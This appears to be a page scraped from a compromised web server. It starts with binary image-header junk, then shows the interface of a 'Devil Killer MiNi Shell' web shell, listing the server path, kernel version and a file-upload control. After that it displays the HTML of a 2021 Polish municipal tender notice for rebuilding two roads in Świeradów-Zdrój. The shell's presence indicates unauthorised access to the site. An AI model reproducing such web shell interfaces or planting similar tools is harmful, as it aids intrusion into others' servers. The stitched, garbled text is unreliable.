JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210802/0013337701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00133377 z dnia 2021-08-02</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Ponowne postępowanie na zadanie pn.: Przebudowa dróg gminnych stanowiących ulice Kilińskiegi i Dąbrowskiego w Świeradowie-<br/>Zdroju </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Świeradów-Zdrój</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821397</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">11 Listopada 35</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świeradów-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-850</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@swieradowzdroj.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://swieradowzdroj.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ponowne postępowanie na zadanie pn.: Przebudowa dróg gminnych stanowiących ulice Kilińskiegi i Dąbrowskiego w Świeradowie-<br/>Zdroju </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-70c6fc06-f364-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00133377</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003468/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Przebudowa dróg gminnych stanowiących ulice Kilińskiegi i Dąbrowskiego w Świeradowie-Zdroju</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.umswieradowzdroj.nv.pl/m,1421,roboty-budowlane.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/http://bip.umswieradowzdroj.nv.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>publicznego,musiposiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>następującychformularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku”<br/>oraz„Formularz dokomunikacji”. 2. Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentówelektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanychprzy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkachkorzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>3.Maksymalny rozmiarplików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia,zmiany,wycofania oferty lub wniosku” i „Formularz do komunikacji”, wynosi 150 MB. 4. Za<br/>datęprzekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeńlub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datęich<br/>przekazania na ePUAP.5. Zamawiający przekazuje link do postępowania oraz ID postępowania.Dane<br/>postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu,klikając<br/>wcześniej opcję„Dla Wykonawców” lub ze strony głównej z zakładki Postępowania. 6. Wpostępowaniu<br/>o udzielenie zamówienia komunikacja pomiędzy zamawiającym a wykonawcami, wszczególności<br/>składanie oświadczeń, wniosków (innych niż wskazanych w pkt 11 SWZ), zawiadomieńoraz<br/>przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza:<br/>„Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. We<br/>wszelkiejkorespondencji związanej z niniejszym postępowaniem zamawiający i wykonawcy posługują<br/>się numerem referencyjnym sprawy, tj. GMiI.271.16/2021. Komunikacja pomiędzy zamawiającym a<br/>wykonawcami, o której mowa w punkcie 7.1. SWZ może również odbywać się za pomocąpoczty<br/>elektronicznej na adres: zp@swieradowzdroj.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">szczegóły w pkt 36 swz</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">szczegóły w pkt 36 swz</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GMiI.271.16/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje przebudowę dróg gminnych stanowiących ulice Kilińskiego i<br/>Dąbrowskiego w Świeradowie-Zdroju.<br/>Technologia wykonania robót drogowych remontowych została określona w specyfikacjach<br/>Technicznych oraz Warunkach wykonania robót drogowych, które stanowią załączniki do SWZ.<br/>Zakres zadania obejmuje min.:<br/>Projekt przewiduje przebudowę dwóch odcinków dróg gminnych ul. Kilińskiego o długości 152,0<br/>m oraz ul. Dąbrowskiego o długości 85,0 m. Nawierzchnię dróg projektowano z mieszanki<br/>bitumicznej AC11S o gr. 4 cm. Jezdnia obu dróg ograniczona opornikiem drogowym betonowym<br/>o wym. 12x25x100 cm posadowionym na ławie betonowej z oporem wykonanej z betonu<br/>C12/15, zatopionym do poziomu nawierzchni jezdni. W ciągu ul. Dąbrowskiego od km 0+000 do<br/>0+020 projektuje się ograniczenie z jednej strony nawierzchni drogi korytem betonowym typu "U"<br/>o wym. 15x60x50 cm posadowionym na ławie betonowej wykonanej z betonu C12/15.<br/>Zestawienie danych technicznych:<br/>ul. Kilińskiego<br/>- powierzchnia jezdni: 642m2<br/>- powierzchnia utwardzonych poboczy: brak<br/>- długość drogi wewnętrznej : 152m<br/>- szerokość drogi: 4,50m<br/>ul. Dąbrowskiego<br/>- powierzchnia jezdni: 285m2<br/>- powierzchnia utwardzonych poboczy: 82m2<br/>- długość drogi wewnętrznej : 85m<br/>- szerokość drogi: 3,00m<br/>- szerokość poboczy: 0,50m<br/>- dł. koryta betonowego: 20m<br/>Warstwy konstrukcji drogi:<br/>- warstwa ścieralna z mieszanki bitumicznej AC11S gr. 4cm,<br/>- warstwa wiążąca z mieszanki bitumicznej AC16W gr. 4cm,<br/>- podbudowa z mieszanki niezwiązanej 0/31,5 stabilizowanej mechanicznie gr. 25cm,<br/>- grunt stabilizowany cementem C1,5/2,0 gr. 15cm.<br/>Warstwy konstrukcji poboczy tylko ul. Dąbrowskiego):<br/>- nawierzchnia z mieszanki niezwiązanej 0/31,5 gr. 15 cm podwójnie skropiona emulsją<br/>bitumiczną. 4.1. Szczegółowy opis przedmiotu zamówienia zawiera umowa, dokumentacja projektowa i<br/>specyfikacje techniczne wykonania i odbioru robót budowlanych zwane dalej dokumentacją.<br/>4.2. Dokumentacja ta jest załącznikiem do ogłoszenia o przetargu i jest dostępna na stronie<br/>internetowej prowadzonego postępowania.<br/>4.3. Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w dokumentacji projektowej lub<br/>STWiORB, a więc w dokumentach opisującym przedmiot zamówienia, zawarto odniesienie do<br/>norm, ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych,<br/>o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy Pzp a takim odniesieniom nie towarzyszyło<br/>wyrażenie „lub równoważne”, to Zamawiający dopuszcza rozwiązania równoważne opisywanym<br/>w każdej takiej normie, ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi<br/>referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, ocenie<br/>technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych<br/>występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne”.<br/>4.4. Zgodnie z art. 101 ust. 5 Pzp wykonawca, który powołuje się na rozwiązania równoważne<br/>opisywanym w tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty<br/>stosownych przedmiotowych środków dowodowych, o których mowa w art. 104-107 ustawy Pzp,<br/>że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">I. ul. Górska (dz. nr 21, am. 7, obr. IV Świeradów-Zdrój) – dł. ok. 250 mb, pow. ok. 1450 m2<br/>Celem realizacji przedmiotowego zadania inwestycyjnego jest wykonanie nakładki z mieszanek mineralno-asfaltowych na istniejący fragment ul. Górskiej, którego jezdnia wykonana jest z trylinki betonowej. Obecna nawierzchnia jest nierówna, zdeformowana z licznymi zapadliskami pomiędzy poszczególnymi kostki z trylinki<br/>Zakres prac:<br/>- regulacja istniejących studni kanalizacji deszczowej i sanitarnej oraz wpustów ulicznych do planowanego poziomu jezdni<br/>- skropienie nawierzchni drogowych emulsją asfaltową (krotność = 1) – ok. 1450 m2,<br/>- wykonanie nawierzchni z mieszanek mineralno-asfaltowych – warstwa wiążąca – gr. warstwy po zagęszczeniu 3-4 cm – ok. 1450 m2,<br/>- skropienie nawierzchni drogowych emulsją asfaltową (krotność = 1) – ok. 1450 m2,<br/>- wykonanie nawierzchni z mieszanek mineralno-asfaltowych – warstwa ścieralna – gr. warstwy po zagęszczeniu 4 cm – ok. 1450 m2,<br/><br/>II. ul. Sudecka (dz. nr 16/2, am. 8, obr. I Świeradów-Zdrój) - dł. ok. 53 mb, pow. ok. 225 m2<br/>Celem realizacji przedmiotowego zadania inwestycyjnego jest wykonanie nakładki z mieszanek mineralno-asfaltowych na istniejący fragment ul. Sudeckiej, którego jezdnia wykonana jest z trylinki betonowej. Obecna nawierzchnia jest nierówna, zdeformowana z licznymi zapadliskami pomiędzy poszczególnymi kostki z trylinki. W zakres zadania wchodzi również przeprofilowanie zjazdu z drogi wojewódzkiej nr 361 na ul. Sudecką (zmniejszenie kąta najazdu)<br/>Zakres prac:<br/>- regulacja istniejących studni kanalizacji deszczowej i sanitarnej oraz wpustów ulicznych do planowanego poziomu jezdni<br/>- skropienie nawierzchni drogowych emulsją asfaltową (krotność = 1) – ok. 225 m2,<br/>- wykonanie nawierzchni z mieszanek mineralno-asfaltowych – warstwa wiążąca – gr. warstwy po zagęszczeniu 3-4 cm – ok. 225 m2,<br/>- skropienie nawierzchni drogowych emulsją asfaltową (krotność = 1) – ok. 225 m2,<br/>- wykonanie nawierzchni z mieszanek mineralno-asfaltowych – warstwa ścieralna – gr. warstwy po zagęszczeniu 4 cm – ok. 225 m2,</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty nieodrzucone oceniane będą według wzoru: (Cmin/Cb *60%)*100+<br/>(Gb/24 * 40%) * 100 = liczba punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 18.1. Dysponowanie osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w<br/>wykonywaniu zamówienia, tj.<br/>• osobą, która będzie pełnić funkcję kierownika budowy w specjalności drogowej,<br/>UWAGA:<br/>Kierownik budowy i robót powinien posiadać uprawnienia budowlane zgodnie z ustawą z dnia<br/>07 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r. poz. 1333 z późn. zm.) oraz<br/>rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie w sprawie<br/>przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. z 2019 r., poz. 831) lub odpowiadające im ważne uprawnienia budowlane,<br/>które zostały wydane na podstawie wcześniej obowiązujących przepisów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta ma być sporządzona zgodnie z warunkami określonymi w SWZ. Dokumenty sporządzone<br/>w języku obcym muszą być złożone wraz z tłumaczeniem na język polski. Dokumenty, które<br/>wykonawcy muszą złożyć wraz z ofertą:<br/>1) Wypełniony FORMULARZ OFERTOWY, stanowiący załącznik nr 2 do SWZ. Do oferty należy<br/>dołączyć aktualne dokumenty potwierdzające status prawny wykonawcy, np. odpis z właściwego<br/>rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej. Oferta nie musi<br/>zawierać tych dokumentów w przypadku wskazania przez wykonawcę, że są one dostępne w<br/>formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych<br/>baz danych.<br/>Upoważnienie osób podpisujących ofertę musi bezpośrednio wynikać z ww. dokumentów.<br/>FORMULARZ OFERTOWY musi ponadto zawierać oświadczenie wykonawcy w zakresie<br/>wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO.<br/>2) Wypełniony załącznik nr 3 do SWZ, stanowiący oświadczenie, o którym mowa w art. 125 ust.<br/>1 ustawy Pzp dotyczące odpowiednio:<br/>a) Wykonawcy;<br/>b) każdego ze wspólników konsorcjum (w przypadku składania oferty wspólnej) oraz każdego ze<br/>wspólników spółki cywilnej;<br/>c) podmiotów „trzecich”, czyli podmiotów, na zasoby których powołuje się wykonawca w celu<br/>spełnienia warunków udziału w postępowaniu, o którym mowa w punkcie 18.1. SWZ oraz<br/>przesłanek wykluczenia z postępowania, o których mowa w art. 108 ust. 1 ustawy Pzp (punkt<br/>13.1. SWZ) oraz art. 109 ust. 1 ustawy Pzp punkty 5, 6, 7, 8, 9 i 10 (punkt 13.2. SWZ).<br/>3) Zobowiązania podmiotów udostępniających zasoby na które wykonawca będzie się<br/>powoływał w celu spełniania warunków udziału w postępowaniu, o których mowa w punkcie<br/>18.1. SWZ. Zgodnie z art. 118 ust. 3 ustawy Pzp musi złożyć wraz z ofertą zobowiązania ww.<br/>podmiotów do oddania mu do dyspozycji tych zasobów na potrzeby realizacji zamówienia albo<br/>inne podmiotowe środki dowodowe potwierdzające, że wykonawca realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Zgodnie z art. 118 ust. 4 ustawy Pzp zobowiązanie podmiotu udostępniającego zasoby, którego<br/>wzór załącznik nr 4 do SWZ, musi potwierdzać, że stosunek łączący wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz musi określać w<br/>szczególności:<br/>a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>4) Pełnomocnictwo ustanowione do reprezentowania Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego (jeżeli dotyczy.<br/>W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) wspólnicy<br/>muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy<br/>dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania<br/>oświadczeń woli każdego ze wspólników. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawca, żaden ze wspólników konsorcjum (w przypadku składania oferty<br/>wspólnej),żadenze wspólników spółki cywilnej ani żaden podmiot, na którego zasoby powołuje<br/>sięwykonawca wcelu spełnienia warunków udziału w postępowaniu nie może podlegać<br/>wykluczeniuzpostępowania na podstawie żadnej z przesłanek, o których mowa w art. 108 ust. 1<br/>ustawyPzp.2.Wypełniony załącznik nr 3 do SWZ, stanowiący oświadczenie, o którym mowa<br/>wart. 125ust. 1ustawy Pzp dotyczące odpowiednio: a) Wykonawcy;b) każdego ze wspólników<br/>konsorcjum(wprzypadku składania oferty wspólnej) oraz każdego ze 